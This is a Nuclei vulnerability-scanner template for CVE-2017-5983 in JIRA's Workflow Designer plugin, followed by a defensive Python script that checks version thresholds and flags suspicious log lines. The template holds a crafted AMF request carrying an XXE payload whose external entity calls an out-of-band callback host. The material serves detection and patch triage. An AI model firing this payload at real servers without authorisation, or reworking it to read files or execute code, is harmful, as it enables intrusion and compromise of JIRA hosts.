The JIRA Workflow Designer Plugin in Atlassian JIRA Server before 6.3.0 improperly uses an XML parser and deserializer, which allows remote attackers to execute arbitrary code, read arbitrary files, or cause a denial of service via a crafted serialized Java object.
PoC code [public]
id: CVE-2017-5983

info:
  name: JIRA Workflow Designer Plugin in Atlassian JIRA Server < 6.3.0 - Remote Code Execution (XXE)
  author: us3r777,Synacktiv
  severity: critical
  description: |
    The JIRA Workflow Designer Plugin in Atlassian JIRA Server before 6.3.0 improperly uses an XML parser and deserializer, which allows remote attackers to execute arbitrary code, read arbitrary files, or cause a denial of service via a crafted serialized Java object.
  impact: |
    Unauthenticated attackers can execute arbitrary code on the server, read arbitrary files, or cause denial of service, potentially leading to complete server compromise.
  remediation: |
    Upgrade to JIRA Server version 6.3.0 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5983
    - https://code-white.com/blog/2017-04-amf/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-5983
    cwe-id: CWE-502
    epss-score: 0.08385
    epss-percentile: 0.9207
    cpe: cpe:2.3:a:atlassian:jira:4.2.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: atlassian
    product: jira
    shodan-query:
      - http.title:"system dashboard - jira"
      - cpe:"cpe:2.3:a:atlassian:jira"
      - http.component:"atlassian confluence"
      - http.component:"atlassian jira"
  tags: cve,cve2017,jira,amf,rce,xxe,vuln

variables:
  # AMF0 packet framing: version, header count, message count, then the
  # target/response URI strings, each prefixed by a 2-byte length.
  version: "\x00\x00"
  header_count: "\x00\x00"
  message_count: "\x00\x01"
  target_uri: "test"
  target_uri_len: "\x00\x04"
  response_uri: "test"
  response_uri_len: "\x00\x04"
  # 0x0f is the AMF0 XML-document type marker that triggers the XML parser.
  xml_marker: "\x0f"
  xxe_payload: '<?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % ext SYSTEM "http://{{interactsh-url}}/amf"> %ext; ]>'
  int: "0000"

flow: http(1) && http(2)

http:
  # Step 1: confirm the target is a JIRA instance before sending the AMF request.
  - method: GET
    path:
      - "{{BaseURL}}/secure/Dashboard.jspa"
      - "{{BaseURL}}/jira/secure/Dashboard.jspa"
      - "{{BaseURL}}/login.jsp"

    stop-at-first-match: true
    host-redirects: true

    matchers:
      - type: word
        part: body
        words:
          - 'title="JiraVersion"'
        internal: true

  # Step 2: post the AMF-framed XML document and wait for an out-of-band callback.
  - raw:
      - |
        POST /plugins/servlet/jwd/amf/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml
        Content-Length: {{len(xxe_payload)+29}}

        {{version}}{{header_count}}{{message_count}}{{target_uri_len}}{{target_uri}}{{response_uri_len}}{{response_uri}}{{url_decode(concat("%00%00%00%",dec_to_hex(len(concat(int,xml_marker,xxe_payload)))))}}{{xml_marker}}{{url_decode(concat("%00%00%00%",dec_to_hex(len(concat(xxe_payload)))))}}{{xxe_payload}}

    unsafe: true
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 4a0a004730450220439aa2c821489ed16bd26784e9170d522dd0acb1de8a4dccce38f37301b376bc022100cdb7037558829faf2071c75352e9cef05a668f8cd8df3dab8ae4f9c7a9b41966:922c64590222798bb761d5b6d8e72950
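The template above fingerprints JIRA through the `title="JiraVersion"` element and then probes the workflow-designer AMF servlet at `/plugins/servlet/jwd/amf/`. From the defender's side the same two facts are enough to triage an inventory against the 6.3.0 remediation threshold and to spot traffic to that servlet in web-server logs. The following Python is an added example, not part of the Nuclei template or of any Atlassian code; the footer markup in `SAMPLE_HTML` and the access-log lines in `SAMPLE_LOG` are constructed for illustration (only the `title="JiraVersion"` attribute and the servlet path come from the template), and a real JIRA page may wrap the version string differently.

```python
import re
from typing import List, Optional, Tuple

# Remediation threshold stated in the template: 6.3.0 and later are fixed.
FIXED_VERSION: Tuple[int, int, int] = (6, 3, 0)

# Servlet path the template's second request targets.
AMF_PATH = "/plugins/servlet/jwd/amf/"

# Constructed sample of a dashboard footer; the surrounding <span> is an assumption.
SAMPLE_HTML = (
    '<div id="footer-build-information">'
    '<a id="about-link" href="/secure/AboutPage.jspa">Atlassian JIRA</a> '
    '<span title="JiraVersion">v6.2.7</span>'
    "</div>"
)

# Constructed combined-format access-log lines (not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /secure/Dashboard.jspa HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "POST /plugins/servlet/jwd/amf/ HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "POST /jira/plugins/servlet/jwd/amf/ HTTP/1.1" 500 0 "-" "curl/8.0"',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /login.jsp HTTP/1.1" 200 2048 "-" "curl/8.0"',
]


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Turn strings like 'v6.2.7' or '6.2' into a comparable (major, minor, patch) tuple."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return None
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def version_from_dashboard(html: str) -> Optional[Tuple[int, int, int]]:
    """Extract the version from the element the template fingerprints on."""
    m = re.search(r'title="JiraVersion"[^>]*>\s*([^<]+?)\s*<', html)
    if not m:
        return None
    return parse_version(m.group(1))


def is_affected(version: Optional[Tuple[int, int, int]]) -> bool:
    """True when the observed version is below the 6.3.0 fix threshold."""
    return version is not None and version < FIXED_VERSION


def flag_amf_posts(log_lines: List[str]) -> List[str]:
    """Return access-log lines that POST to the workflow-designer AMF servlet.

    The pattern tolerates a context path (e.g. /jira/...) in front of the servlet,
    matching the two base paths the template itself tries.
    """
    pat = re.compile(r'"POST\s+\S*' + re.escape(AMF_PATH))
    return [line for line in log_lines if pat.search(line)]


def triage(html: str, log_lines: List[str]) -> dict:
    """Combine both checks into one summary a responder can act on."""
    version = version_from_dashboard(html)
    return {
        "version": version,
        "below_fixed_version": is_affected(version),
        "amf_post_count": len(flag_amf_posts(log_lines)),
    }


if __name__ == "__main__":
    summary = triage(SAMPLE_HTML, SAMPLE_LOG)
    print(f"observed version: {summary['version']}")
    print(f"below 6.3.0: {summary['below_fixed_version']}")
    print(f"POSTs to {AMF_PATH}: {summary['amf_post_count']}")
```

The version check is a prioritisation aid only: a host reporting 6.3.0 or later is outside the affected range stated by the template, while an older version on an instance that exposes the AMF servlet belongs at the top of the patch queue. Because AMF traffic to this servlet is unusual for ordinary browser use, a single POST hit in the log is worth a closer look even when the response was an error.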